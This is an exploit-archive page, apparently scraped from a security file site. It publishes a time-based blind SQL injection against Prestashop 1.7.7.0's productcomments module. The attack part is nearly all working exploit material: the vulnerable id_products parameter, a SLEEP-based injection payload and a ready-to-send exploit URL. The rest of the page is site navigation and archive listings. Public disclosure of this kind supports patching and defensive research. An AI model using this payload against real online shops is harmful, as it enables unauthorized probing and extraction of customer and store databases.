Prestashop 1.7.7.0 SQL Injection

Prestashop 1.7.7.0 SQL Injection: Posted Jan 11, 2021; Authored by Jaimin Gondaliya; Prestashop version 1.7.7.0 suffers from a remote blind SQL injection vulnerability.; tags | exploit, remote, sql injection; SHA-256 | 986c58053d7da6aecd728769b410a19b4a37c721d590a74d2a57621ff722f806; Download | Favorite | View

Prestashop 1.7.7.0 SQL Injection

# Exploit Title: Prestashop 1.7.7.0 - 'id_product' Time Based Blind SQL Injection
# Date: 08-01-2021
# Exploit Author: Jaimin Gondaliya
# Vendor Homepage: https://www.prestashop.com
# Software Link: https://www.prestashop.com/en/download
# Version: Prestashop CMS - 1.7.7.0
# Tested on: Windows 10

Parameter: id_product

Payload: 1 AND (SELECT 3875 FROM (SELECT(SLEEP(5)))xoOt)

Exploit:
http://localhost/shop//index.php?fc=module&module=productcomments&controller=CommentGrade&id_products[]=1%20AND%20(SELECT%203875%20FROM%20(SELECT(SLEEP(5)))xoOt)

Top Authors In Last 30 Days

Red Hat 179 files
Ubuntu 58 files
Debian 26 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
E1.Coders 4 files
malvuln 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

Prestashop 1.7.7.0 SQL Injection

Prestashop 1.7.7.0 SQL Injection

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Prestashop 1.7.7.0 SQL Injection

Share This

Prestashop 1.7.7.0 SQL Injection

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems